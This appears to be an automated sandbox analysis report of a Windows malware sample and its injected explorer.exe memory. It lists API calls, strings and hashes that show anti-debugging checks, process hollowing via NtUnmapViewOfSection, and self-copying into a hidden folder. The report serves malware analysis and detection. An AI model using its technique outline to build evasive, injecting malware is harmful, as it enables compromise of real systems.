Instruction ID: d91a722312539cbd055f8d3e804656477d907fb3d7cee474e97d3526f185c02a
Opcode Fuzzy Hash: 7e0912bcf351996b291bf4fb3f87cb9c28880ce2d9d20d15a7e9bb782bf88500
Instruction Fuzzy Hash: EB01862571679081DA549F17F94432AA791EB4DFC0F4C9034EE4F47B19EE2CD4818B44

Function 09824CB0 Relevance: 6.2, APIs: 4, Instructions: 195stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

isxdigit.MSVCRT ref: 09824DD0
_errno.MSVCRT ref: 09824DF6
strtol.MSVCRT ref: 09824E12
_errno.MSVCRT ref: 09824E1A

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: _errno$isxdigitstrtol
String ID:
API String ID: 1632192098-0
Opcode ID: 36a23a62e35a68befc3644e019d1d83519569c769ab166e668e410ab635532b5
Instruction ID: adf6e92bc2be73d54e43cadd77aafafe281d680f88a52f490ce96f3ae3a78d96
Opcode Fuzzy Hash: 36a23a62e35a68befc3644e019d1d83519569c769ab166e668e410ab635532b5
Instruction Fuzzy Hash: C3613A27304BA486EB218F35E85436A7B50F395B94F495119DF8A8B7A5DF3DC0C1C721

Function 09822E10 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 09822E41
Process32First.KERNEL32 ref: 09822E5F
Process32Next.KERNEL32 ref: 09822E7F
Process32Next.KERNEL32 ref: 09822EA7

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$Next$CreateFirstSnapshotToolhelp32
String ID:
API String ID: 1264244614-0
Opcode ID: fca3f0629636ecf2a2a28a1cd1d999478e7961aba545bddf249877430241f3f3
Instruction ID: 7e534c9874fbd949457ec32a3243ed1ea453b11e02c076557245566a483ce5c9
Opcode Fuzzy Hash: fca3f0629636ecf2a2a28a1cd1d999478e7961aba545bddf249877430241f3f3
Instruction Fuzzy Hash: 8F119362214A8091CE24EB29E4503AE6371FB897D4FC4A629DAAD87798DF3CC645CB40

Function 0982508C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 0982509C
strncmp.MSVCRT ref: 098250E0

Strings

true, xrefs: 0982508F
false, xrefs: 098250D3

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: strncmp
String ID: false$true
API String ID: 1114863663-2658103896
Opcode ID: c48887af418da941c8850194f4343dad7ba23ae3c88db934cbe84a9260ac729e
Instruction ID: 00f0c8905c4c938e757715c07c223be42738c8dedfaa173d140616980fc2075c
Opcode Fuzzy Hash: c48887af418da941c8850194f4343dad7ba23ae3c88db934cbe84a9260ac729e
Instruction Fuzzy Hash: AD014F6171599082EB90CF67F54071A6360FB85FC8F49901ADF5D8BB4DEF2AC591CB04

Function 0333C11C Relevance: 6.0, APIs: 4, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

abort.LIBCMT ref: 0333C153
_NMSG_WRITE.LIBCMT ref: 0333C179
_set_abort_behavior.LIBCMT ref: 0333C185
abort.LIBCMT ref: 0333C18A

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: abort$_set_abort_behavior
String ID:
API String ID: 2064194629-0
Opcode ID: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
Instruction ID: e7daa9d984cd6561ce9bd87bece0c6ce60a4cf48894e8ea655c69876080fb63e
Opcode Fuzzy Hash: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
Instruction Fuzzy Hash: FDF0A028E11B09D5EE1AEBA0FDE432C2364FB8A740F889914954D4B724CE3CE391C300

Function 0332D230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03332A90: _RunAllParam.LIBCPMT ref: 03332AAC

_RunAllParam.LIBCPMT ref: 0332D263
_RunAllParam.LIBCPMT ref: 0332D276

Strings

and )., xrefs: 0332D23A

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: Param
String ID: and ).
API String ID: 1698386829-1089536224
Opcode ID: 184ffe6a515dd46526c9c3b3ab7d42159a35620b1830b27d2eb492d9c63b974d
Instruction ID: fac5fb337e0abbde4657b75210f0f40b083908ca282710aea49837421b8e9db8
Opcode Fuzzy Hash: 184ffe6a515dd46526c9c3b3ab7d42159a35620b1830b27d2eb492d9c63b974d
Instruction Fuzzy Hash: 65F03075B02B1585DF25EFA7D4E032A2325EB85FC4F189521CD0E4F314CD29C4839380

Function 0333BDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

std::locale::_Locimp::_Locimp_dtor.LIBCPMT ref: 0333BDD9

Part of subcall function 0333BEF4: std::_Lockit::_Lockit.LIBCPMT ref: 0333BF12
Part of subcall function 0333BEF4: free.LIBCMT ref: 0333BF50
Part of subcall function 0333BEF4: std::_Lockit::~_Lockit.LIBCPMT ref: 0333BF5B

free.LIBCMT ref: 0333BDE7

Part of subcall function 0333CACC: _errno.LIBCMT ref: 0333CAEC

Strings

ore, xrefs: 0333BDF1

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: Lockitfreestd::_$Locimp::_Locimp_dtorLockit::_Lockit::~__errnostd::locale::_
String ID: ore
API String ID: 161006167-2619071404
Opcode ID: 5f127ecb6d852186a7a4016091c7f99b380aeb7868c6ab7e7f9e58955c649337
Instruction ID: 9dd1197f10e02dc9dbd4ac07e0d4b2fa93116eb22babee9d781139595f00e4fc
Opcode Fuzzy Hash: 5f127ecb6d852186a7a4016091c7f99b380aeb7868c6ab7e7f9e58955c649337
Instruction Fuzzy Hash: 65F03936A12B4194DF1ADF6AF8D0368B368AB89B94F6D9120DA0C4A324DE38C590C300

Function 0333B6B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0333B6CC

Part of subcall function 0333E028: std::exception::_Copy_str.LIBCMT ref: 0333E047

_CxxThrowException.LIBCMT ref: 0333B6ED

Strings

lp32Snapshot, xrefs: 0333B6D8

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
String ID: lp32Snapshot
API String ID: 1924332735-2612382832
Opcode ID: a723fdbf8b2a5431af685e8c51f8ba99275f1b1f5113f0538031b3811cd6a6f9
Instruction ID: 8997eb7253dc8453333ec2dc8d2b1ad45ea13e70821b2e1dffbf2f30b53f64c0
Opcode Fuzzy Hash: a723fdbf8b2a5431af685e8c51f8ba99275f1b1f5113f0538031b3811cd6a6f9
Instruction Fuzzy Hash: D8E09A66614B8A91DB20DB60F4C0749A7A4F799348F505515928D4AA28EA7CC349CB00

Function 0333B678 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0333B68B

Part of subcall function 0333E028: std::exception::_Copy_str.LIBCMT ref: 0333E047

_CxxThrowException.LIBCMT ref: 0333B6A8

Strings

lstrcpyA, xrefs: 0333B697

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
String ID: lstrcpyA
API String ID: 1924332735-2919489367
Opcode ID: 75d6338df16f3fc7e94c6d15f4162d0a48cce31c61ba757d02e5b78a9ed6e38f
Instruction ID: 19335c6cbf643d451d55efd394ad7192ddedcfe3f0a639a3851885e83a770a38
Opcode Fuzzy Hash: 75d6338df16f3fc7e94c6d15f4162d0a48cce31c61ba757d02e5b78a9ed6e38f
Instruction Fuzzy Hash: 74D04C66504B8A91DE25DB40E480399B365F795348F805611928C1BA28DBBCD719CB01

Function 0333B640 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0333B653

Part of subcall function 0333E028: std::exception::_Copy_str.LIBCMT ref: 0333E047

_CxxThrowException.LIBCMT ref: 0333B670

Strings

enProcess, xrefs: 0333B65F

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
String ID: enProcess
API String ID: 1924332735-3780156600
Opcode ID: 835f7303bc4335b4334c273b3c7294a297f77a417c1691680fa63035e0e7157f
Instruction ID: 083a185add04304273ed6f720cc157532671a2fdb931b08d14f41d23c663a5b6
Opcode Fuzzy Hash: 835f7303bc4335b4334c273b3c7294a297f77a417c1691680fa63035e0e7157f
Instruction Fuzzy Hash: 2CD06267544F8A91DE25DB40F4C0399B374F795348F80551192CC1BE28DBBCD319CB41

Function 0983A990 Relevance: 5.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0983A9A0
free.MSVCRT ref: 0983A9EE
free.MSVCRT ref: 0983A9F9
memset.MSVCRT ref: 0983AA09

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: free$CriticalEnterSectionmemset
String ID:
API String ID: 3605230531-0
Opcode ID: 4b79464cb83e92cc1290e2fe8b6cc4568c70f35dff0e471b1119b8fe8653bd10
Instruction ID: cbf59801b030b61d7b7faf97e8a66c907751abb11af0f6ec345af54a3aaf886b
Opcode Fuzzy Hash: 4b79464cb83e92cc1290e2fe8b6cc4568c70f35dff0e471b1119b8fe8653bd10
Instruction Fuzzy Hash: 4621FB23A1AE84CAF719CF3AEC9439827A0F7B6B04F4D501AD6598F3A2DE25C045C748

Analysis Process: 1DC30FADAFF92643095942.exePID: 5340, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	40.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	483
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF6743D2048 Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF6743D20AD

Strings

NtUnmapViewOfSection, xrefs: 00007FF6743D23AE
.reloc, xrefs: 00007FF6743D264F
@, xrefs: 00007FF6743D2429
ntdll, xrefs: 00007FF6743D2399

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: FileModuleName
String ID: .reloc$@$NtUnmapViewOfSection$ntdll
API String ID: 514040917-3001742581
Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
Instruction ID: fa44ed09526f3543d9b1a67eb9914dff32f547d9e6079499d98b5dbdd5633cb8
Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
Instruction Fuzzy Hash: 1E32C53262CAC1C6E774CB16E8987AAA3A1FBC9B95F504135DA9D83B58DF3CD5448F00

Function 00007FF6743D345C Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6743D321C: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00007FF6743D346D), ref: 00007FF6743D3220

ExitProcess.KERNEL32 ref: 00007FF6743D3476
ExitProcess.KERNEL32 ref: 00007FF6743D34D4

Strings

svchost.exe, xrefs: 00007FF6743D3497
worker_kBEqZh, xrefs: 00007FF6743D3561
msiexec.exe, xrefs: 00007FF6743D34FB
worker_RdDwvE, xrefs: 00007FF6743D34BF
worker_BAccdq, xrefs: 00007FF6743D3510
audiodg.exe, xrefs: 00007FF6743D354C
worker_FDhvwc, xrefs: 00007FF6743D35CD

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: ExitProcess$DebuggerPresent
String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
API String ID: 613740775-1953711635
Opcode ID: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
Instruction ID: b72a185865ee9549bb7df6e53b394f1c79ed124ad55c31b52d3c67646bf938a3
Opcode Fuzzy Hash: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
Instruction Fuzzy Hash: 86610E22A2CA53D2FB64AB77E8DD27D6261BF84721F700135E45EC61E5DF2DE8098E10

Function 00007FF6743D4264 Relevance: 10.6, APIs: 7, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3481), ref: 00007FF6743D4268
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3481), ref: 00007FF6743D427B
GetTokenInformation.KERNELBASE ref: 00007FF6743D42AC
GetTokenInformation.KERNELBASE ref: 00007FF6743D42DE
CloseHandle.KERNEL32 ref: 00007FF6743D42ED

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: Token$InformationProcess$CloseCurrentHandleOpen
String ID:
API String ID: 434396405-0
Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
Instruction ID: 2e5e60e654f2aeb958fb795d2baff0e94fedc1fb0f12dc13c3c3276502bc7401
Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
Instruction Fuzzy Hash: 9931E43262CA81C6E750CB16E49862EB7A0FBD47A1F605135FA8E83B68DF7CD4558F00

Function 00007FF6743D38C4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6743D3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6743D3784
Part of subcall function 00007FF6743D3744: GetVolumeInformationW.KERNELBASE ref: 00007FF6743D3801
Part of subcall function 00007FF6743D3744: wsprintfW.USER32 ref: 00007FF6743D38A2

SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D390D
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3922
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3935
CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3945
SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3958
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D396D
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3980
lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3995

Strings

.exe, xrefs: 00007FF6743D3986

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
String ID: .exe
API String ID: 1846285901-4119554291
Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
Instruction ID: 27af64ff61ff781a150111514a63f49001681e74ee56c479e1837d1c22e4e7dd
Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
Instruction Fuzzy Hash: 59112422638986D6DB609F26F89876EA362FBC4B91F505031D94E83A29DF3CD405CF40

Function 00007FF6743D3A74 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6743D3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6743D3784
Part of subcall function 00007FF6743D3744: GetVolumeInformationW.KERNELBASE ref: 00007FF6743D3801
Part of subcall function 00007FF6743D3744: wsprintfW.USER32 ref: 00007FF6743D38A2

Part of subcall function 00007FF6743D38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D390D
Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3922
Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3935
Part of subcall function 00007FF6743D38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3945
Part of subcall function 00007FF6743D38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3958
Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D396D
Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3980
Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3995

GetModuleFileNameW.KERNEL32 ref: 00007FF6743D3AB9
DeleteFileW.KERNELBASE ref: 00007FF6743D3AC4
CopyFileW.KERNELBASE ref: 00007FF6743D3ADD
SetFileAttributesW.KERNEL32 ref: 00007FF6743D3AF5

Strings

Services, xrefs: 00007FF6743D3B00

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
String ID: Services
API String ID: 3209240227-2319745855
Opcode ID: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
Instruction ID: 4545c352f3319674d136e6221a7841f1f5d634186def12e4cbd59b783a5cf020
Opcode Fuzzy Hash: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
Instruction Fuzzy Hash: B0015662B28982D3EB60DB25E4D83AA5360FB94754FA05432D65DC35A8EF3CD64ECF00

Function 00007FF6743D3744 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32 ref: 00007FF6743D3784
GetVolumeInformationW.KERNELBASE ref: 00007FF6743D3801
wsprintfW.USER32 ref: 00007FF6743D38A2

Strings

%08lX%04lX%lu, xrefs: 00007FF6743D3893

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: DirectoryInformationVolumeWindowswsprintf
String ID: %08lX%04lX%lu
API String ID: 3001812590-640692576
Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
Instruction ID: 37e78dd6a50f63bf1db3f9a8b4bba438eb737e5d9f4c122025590558e1339d30
Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
Instruction Fuzzy Hash: 9631C26662C6C1C6DB20DB65E4983AAB3A0FB84754F501136E68D87A98EF7DD909CF00

Function 00007FF6743D321C Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00007FF6743D346D), ref: 00007FF6743D3220
GetCurrentProcess.KERNEL32 ref: 00007FF6743D3236
CheckRemoteDebuggerPresent.KERNELBASE ref: 00007FF6743D3244

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: DebuggerPresent$CheckCurrentProcessRemote
String ID:
API String ID: 3920101602-0
Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
Instruction ID: 44ebbc253eaf5049f788e68f207f39ea445752864cfa5f47ed82b8862a421880
Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
Instruction Fuzzy Hash: F2F0FE26D1C282C2E7304F67E44C3796790AF45B19F641174D98D86594CF6CEA09DF11

Function 00007FF6743D1050 Relevance: 3.0, APIs: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00007FF6743D1063
GetProcAddress.KERNEL32 ref: 00007FF6743D1078

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
Instruction ID: 3820437e110c4e42a2dec4e78ce41128f89375a90487a415d3eebbc1aaf959ef
Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
Instruction Fuzzy Hash: A6E09276518F80C6C6209B15F88401AB7B4FBC8795FA04125EACD82B28DF3CC169CB00

Function 00007FF6743D3B54 Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FF6743D3B70

